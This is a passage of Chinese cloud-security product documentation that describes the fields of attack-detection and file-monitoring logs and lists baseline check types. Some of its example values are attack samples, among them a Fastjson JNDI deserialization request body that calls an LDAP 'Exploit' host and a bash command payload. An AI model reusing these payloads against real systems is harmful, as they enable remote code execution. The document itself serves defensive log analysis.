章节ID。您可以通过ListCheckResult - 查看云产品中云平台配置检查风险项结果详情接口获取ID值。

1

standard_id

标准ID。您可以通过ListCheckStandard - 云平台配置检查获取标准列表接口获取该ID。

1

status

检查项的状态。取值:

  • NOT_CHECK:未检查。

  • CHECKING:检查中。

  • PASS:检查通过。

  • NOT_PASS:检查未通过。

  • WHITELIST:已加入白名单。

PASS

vendor

所属云厂商。固定取值:ALIYUN。

ALIYUN

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

网络防御日志

字段名

说明

示例

cmd

被攻击的进程命令行。

nginx: master process nginx

cur_time

攻击事件的发生时间。

2023-09-14 09:21:59

decode_payload

HEX格式转换为字符的payload。

POST /Services/FileService/UserFiles/

dst_ip

被攻击资产的IP地址。

172.16.XX.XX

dst_port

被攻击资产的端口。

80

func

拦截事件的类型。取值:

  • payload:恶意负载类型,表示由于检测到恶意数据或指令而触发的攻击事件拦截。

  • tuple:恶意IP类型,表示由于检测到恶意IP访问而触发的攻击事件拦截。

payload

rule_type

拦截事件的具体规则类型。取值:

  • alinet_payload:云安全中心指定的payload事件防御规则。

  • alinet_tuple:云安全中心指定的tuple事件防御规则。

alinet_payload

instance_id

被攻击资产的实例ID。

i-2zeg4zldn8zypsfg****

internet_ip

被攻击资产的公网IP。

39.104.XX.XX

intranet_ip

被攻击资产的私网IP。

192.168.XX.XX

final_action

防御动作模式。取值:block(已拦截)。

block

payload

HEX格式的payload。

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

被攻击的进程ID。

7107

platform

被攻击资产的系统类型。取值:

  • win

  • linux

linux

proc_path

被攻击的进程路径。

/usr/sbin/nginx

sas_group_name

服务器在云安全中心的资产分组。

default

src_ip

发起攻击的源IP地址。

106.11.XX.XX

src_port

发起攻击的源端口。

29575

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

应用防护日志

字段名

说明

示例

app_dir

应用所在目录。

/usr/local/aegis/rasp/apps/1111

app_id

应用ID。

6492a391fc9b4e2aad94****

app_name

应用名称。

test

confidence_level

检测算法的置信度。取值:

  • high

  • medium

  • low

low

request_body

请求体信息。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

请求体长度。

112

data

hook点参数。

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

请求头信息。

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

主机或网络设备的名称。

testhostname

host_ip

主机私网IP地址。

172.16.XX.XX

is_cliped

该条日志是否因为超长被裁剪过。取值:

  • true:已裁剪

  • false:未裁剪

false

jdk_version

JDK版本。

1.8.0_292

message

告警描述信息。

Unsafe class serial.

request_method

请求方法。

Post

platform

操作系统类型。

Linux

arch

操作系统架构。

amd64

kernel_version

操作系统内核版本。

3.10.0-1160.59.1.el7.x86_64

param

请求参数,常见格式包括:

  • GET参数。

  • application/x-www-form-urlencoded。

{"url":["http://127.0.0.1.xip.io"]}

payload

有效攻击载荷。

bash -c kill -0 -- -'31098'

payload_length

有效攻击载荷长度。

27

rasp_id

应用防护探针唯一ID。

fa00223c8420e256c0c98ca0bd0d****

rasp_version

应用防护探针版本。

0.8.5

src_ip

请求者IP地址。

172.0.XX.XX

final_action

告警处理结果。取值:

  • block:防护,即阻断。

  • monitor:监控。

block

rule_action

规则指定的告警处理方式。取值:

  • block

  • monitor

block

risk_level

风险级别。取值:

  • high

  • medium

  • low

high

stacktrace

堆栈信息。

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

触发告警的时间。

2023-10-09 15:19:15

timestamp

触发告警的时间戳,单位为毫秒。

1696835955070

type

漏洞类型。取值:

  • attach:恶意Attach。

  • beans:恶意beans绑定。

  • classloader:恶意类加载。

  • dangerous_protocol:危险协议使用。

  • dns:恶意DNS查询。

  • engine:引擎注入。

  • expression:表达式注入。

  • file:恶意文件读写。

  • file_delete:任意文件删除。

  • file_list:目录遍历。

  • file_read:任意文件读取。

  • file_upload:恶意文件上传。

  • jndi:JNDI注入。

  • jni:JNI注入。

  • jstl:JSTL任意文件包含。

  • memory_shell:内存马注入。

  • rce:命令执行。

  • read_object:反序列化攻击。

  • reflect:恶意反射调用。

  • sql:SQL注入。

  • ssrf:恶意外连。

  • thread_inject:线程注入。

  • xxe:XXE攻击。

rce

url

请求URL。

http://127.0.0.1:999/xxx

rasp_attack_uuid

漏洞UUID。

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

主机UUID。

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

主机公网IP地址。

1.2.XX.XX

intranet_ip

主机私网IP地址。

172.16.XX.XX

sas_group_name

云安全中心服务器分组名称。

分组1

instance_id

主机实例ID。

i-wz995eivg28f1m**

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

恶意文件检测日志

字段名

说明

示例

bucket_name

Bucket名称。

***-test

event_id

告警ID。

802210

event_name

告警名称。

挖矿程序

md5

文件的MD5值。

6bc2bc******53d409b1

sha256

文件的SHA256值。

f038f9525******7772981e87f85

result

检测结果。取值:

  • 0:文件安全。

  • 1:存在恶意文件。

0

file_path

文件路径。

test.zip/bin_test

etag

OSS文件标识。

6BC2B******853D409B1

risk_level

风险等级。取值:

  • serious:紧急。

  • suspicions:可疑。

  • remind:提醒。

remind

source

检测场景。

  • OSS:在云安全中心控制台执行对阿里云对象存储Bucket内文件的检测。

  • API:通过SDK接入的方式检测恶意文件,支持通过Java或Python方式接入。

OSS

parent_md5

父类文件或压缩包文件的MD5值。

3d0f8045bb9******

parent_sha256

父类文件或压缩包文件的SHA256值。

69b643d6******a3fb859fa

parent_file_path

父类文件或压缩包文件的名称。

test.zip

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

核心文件监控事件日志

字段名

说明

示例

start_time

事件的最新发生时间。单位为秒。

1718678414

uuid

客户端的UUID。

5d83b26b-b**a-4**a-9267-12****

file_path

文件路径。

/etc/passwd

proc_path

进程路径。

/usr/bin/bash

rule_id

命中规则ID。

123

rule_name

规则名称。

file_test_rule

cmdline

命令行。

bash /opt/a

operation

对文件的操作。

READ

risk_level

告警等级。

2

pid

进程ID。

45324

proc_permission

进程权限。

rwxrwxrwx

instance_id

实例ID。

i-wz995eivg2****

internet_ip

互联网IP。

192.0.2.1

intranet_ip

私网IP。

172.16.0.1

instance_name

实例名称。

aegis-test

platform

操作系统类型。

Linux

附录

基线类型及子类型列表

类型名称

子类型名称

描述

hc_exploit

hc_exploit_redis

高危风险利用-Redis未授权访问高危风险

hc_exploit_activemq

高危风险利用-ActiveMQ未授权访问高危风险

hc_exploit_couchdb

高危风险利用-CouchDB未授权访问高危风险

hc_exploit_docker

高危风险利用-Docker未授权访问高危风险

hc_exploit_es

高危风险利用-Elasticsearch未授权访问高危风险

hc_exploit_hadoop

高危风险利用-Hadoop未授权访问高危风险

hc_exploit_jboss

高危风险利用-Jboss未授权访问高危风险

hc_exploit_jenkins

高危风险利用-Jenkins未授权访问高危风险

hc_exploit_k8s_api

高危风险利用Kubernetes-Apiserver未授权访问高危风险

hc_exploit_ldap

高危风险利用-LDAP未授权访问高危风险(Windows环境)

hc_exploit_ldap_linux

高危风险利用-openLDAP未授权访问高危风险(Linux环境)

hc_exploit_memcache

高危风险利用-Memcached未授权访问高危风险

hc_exploit_mongo

高危风险利用-Mongodb未授权访问高危风险

hc_exploit_pgsql

高危风险利用-Postgresql未授权访问高危风险基线

hc_exploit_rabbitmq

高危风险利用-RabbitMQ未授权访问高危风险

hc_exploit_rsync

高危风险利用-rsync未授权访问高危风险

hc_exploit_tomcat

高危风险利用-Apache Tomcat AJP文件包含漏洞风险

hc_exploit_zookeeper

高危风险利用-ZooKeeper未授权访问高危风险

hc_container

hc_docker

阿里云标准-Docker安全基线检查

hc_middleware_ack_master

国际通用安全最佳实践-Kubernetes(ACK) Master节点安全基线检查

hc_middleware_ack_node

国际通用安全最佳实践-Kubernetes(ACK) Node节点安全基线检查

hc_middleware_k8s

阿里云标准-Kubernetes-Master安全基线检查

hc_middleware_k8s_node

阿里云标准-Kubernetes-Node安全基线检查

cis

hc_suse 15_djbh

等保三级-SUSE 15合规基线检查

hc_aliyun_linux3_djbh_l3

等保三级-Alibaba Cloud Linux 3合规基线检查

hc_aliyun_linux_djbh_l3

等保三级-Alibaba Cloud Linux/Aliyun Linux 2合规基线检查

hc_bind_djbh

等保三级-Bind合规基线检查

hc_centos 6_djbh_l3

等保三级-CentOS Linux 6合规基线检查

hc_centos 7_djbh_l3

等保三级-CentOS Linux 7合规基线检查

hc_centos 8_djbh_l3

等保三级-CentOS Linux 8合规基线检查

hc_debian_djbh_l3

等保三级-Debian Linux 8/9/10合规基线检查

hc_iis_djbh

等保三级-IIS合规基线检查

hc_informix_djbh

等保三级-Informix合规基线检查

hc_jboss_djbh

等保三级-Jboss合规基线检查

hc_mongo_djbh

等保三级-MongoDB合规基线检查

hc_mssql_djbh

等保三级-SQL Server合规基线检查

hc_mysql_djbh

等保三级-MySql合规基线检查

hc_nginx_djbh

等保三级-Nginx合规基线检查

hc_oracle_djbh

等保三级-Oracle合规基线检查

hc_pgsql_djbh

等保三级-PostgreSql合规基线检查

hc_redhat 6_djbh_l3

等保三级-Redhat Linux 6合规基线检查

hc_redhat_djbh_l3

等保三级-Redhat Linux 7合规基线检查

hc_redis_djbh

等保三级-Redis合规基线检查

hc_suse 10_djbh_l3

等保三级-SUSE 10合规基线检查

hc_suse 12_djbh_l3

等保三级-SUSE 12合规基线检查

hc_suse_djbh_l3

等保三级-SUSE 11合规基线检查

hc_ubuntu 14_djbh_l3

等保三级-Ubuntu 14合规基线检查

hc_ubuntu_djbh_l3

等保三级-Ubuntu 16/18/20合规基线检查

hc_was_djbh

等保三级-Websphere Application Server合规基线检查

hc_weblogic_djbh

等保三级-Weblogic合规基线检查

hc_win 2008_djbh_l3

等保三级-Windows 2008 R2合规基线检查

hc_win 2012_djbh_l3

等保三级-Windows 2012 R2合规基线检查

hc_win 2016_djbh_l3

等保三级-Windows 2016/2019 合规基线检查

hc_aliyun_linux_djbh_l2

等保二级-Alibaba Cloud Linux/Aliyun Linux 2合规基线检查

hc_centos 6_djbh_l2

等保二级-CentOS Linux 6合规基线检查

hc_centos 7_djbh_l2

等保二级-CentOS Linux 7合规基线检查

hc_debian_djbh_l2

等保二级-Debian Linux 8合规基线检查

hc_redhat 7_djbh_l2

等保二级-Redhat Linux 7合规基线检查

hc_ubuntu_djbh_l2

等保二级-Ubuntu16/18合规基线检查

hc_win 2008_djbh_l2

等保二级-Windows 2008 R2合规基线检查

hc_win 2012_djbh_l2

等保二级-Windows 2012 R2合规基线检查

hc_win 2016_djbh_l2

等保二级-Windows 2016/2019 合规基线检查

hc_aliyun_linux_cis

国际通用安全最佳实践-Alibaba Cloud Linux/Aliyun Linux 2安全基线检查

hc_centos 6_cis_rules

国际通用安全最佳实践-CentOS Linux 6安全基线检查

hc_centos 7_cis_rules

国际通用安全最佳实践-CentOS Linux 7安全基线检查

hc_centos 8_cis_rules

国际通用安全最佳实践-CentOS Linux 8安全基线检查

hc_debian 8_cis_rules

国际通用安全最佳实践-Debian Linux 8安全基线检查

hc_ubuntu 14_cis_rules

国际通用安全最佳实践-Ubuntu 14安全基线检查

hc_ubuntu 16_cis_rules

国际通用安全最佳实践-Ubuntu 16/18/20安全基线检查

hc_win 2008_cis_rules

国际通用安全最佳实践-Windows Server 2008 R2安全基线检查

hc_win 2012_cis_rules

国际通用安全最佳实践-Windows Server 2012 R2安全基线检查

hc_win 2016_cis_rules

国际通用安全最佳实践-Windows Server 2016/2019 R2安全基线检查

hc_kylin_djbh_l3

等保三级-麒麟合规基线检查

hc_uos_djbh_l3

等保三级-Uos合规基线检查

hc_best_security

hc_aliyun_linux

阿里云标准-Alibaba Cloud Linux/Aliyun Linux 2安全基线检查

hc_centos 6

阿里云标准-CentOS Linux 6安全基线检查

hc_centos 7

阿里云标准-CentOS Linux 7/8安全基线检查

hc_debian

阿里云标准-Debian Linux 8/9/10安全基线检查

hc_redhat 6

阿里云标准-Redhat Linux 6安全基线检查

hc_redhat 7

阿里云标准-Redhat Linux 7/8安全基线检查

hc_ubuntu

阿里云标准-Ubuntu安全基线检查

hc_windows_2008

阿里云标准-Windows 2008 R2安全基线检查

hc_windows_2012

阿里云标准-Windows 2012 R2安全基线检查

hc_windows_2016

阿里云标准-Windows 2016/2019 安全基线检查

hc_db_mssql

阿里云标准-SQL server安全基线检查

hc_memcached_ali

阿里云标准-Memcached安全基线检查

hc_mongodb

阿里云标准-MongoDB 3.x版本安全基线检查

hc_mysql_ali

阿里云标准-Mysql安全基线检查

hc_oracle

阿里云标准-Oracle 11g安全基线检查

hc_pgsql_ali

阿里云标准-PostgreSql安全基线检查

hc_redis_ali

阿里云标准-Redis安全基线检查

hc_apache

阿里云标准-Apache安全基线检查

hc_iis_8

阿里云标准-IIS 8安全基线检查

hc_nginx_linux

阿里云标准-Nginx安全基线检查

hc_suse 15

阿里云标准-SUSE Linux 15安全基线检查

tomcat 7

阿里云标准-Apache Tomcat 安全基线检查

weak_password

hc_mongodb_pwd

弱口令-MongoDB登录弱口令检测(支持2.x版本)

hc_weakpwd_ftp_linux

弱口令-FTP登录弱口令检查

hc_weakpwd_linux_sys

弱口令-Linux系统登录弱口令检查

hc_weakpwd_mongodb 3

弱口令-MongoDB登录弱口令检测

hc_weakpwd_mssql

弱口令-SQL Server数据库登录弱口令检查

hc_weakpwd_mysql_linux

弱口令-Mysql数据库登录弱口令检查

hc_weakpwd_mysql_win

弱口令-Mysql数据库登录弱口令检查(Windows版)

hc_weakpwd_openldap

弱口令-Openldap登录弱口令检查

hc_weakpwd_oracle

弱口令-Oracle登录弱口令检测

hc_weakpwd_pgsql

弱口令-PostgreSQL数据库登录弱口令检查

hc_weakpwd_pptp

弱口令-pptpd服务登录弱口令检查

hc_weakpwd_redis_linux

弱口令-Redis数据库登录弱口令检查

hc_weakpwd_rsync

弱口令-rsync服务登录弱口令检查

hc_weakpwd_svn

弱口令-svn服务登录弱口令检查

hc_weakpwd_tomcat_linux

弱口令-Apache Tomcat控制台弱口令检查

hc_weakpwd_vnc

弱口令-VncServer弱口令检查

hc_weakpwd_weblogic

弱口令-Weblogic 12c登录弱口令检测

hc_weakpwd_win_sys

弱口令-Windows系统登录弱口令检查

相关文档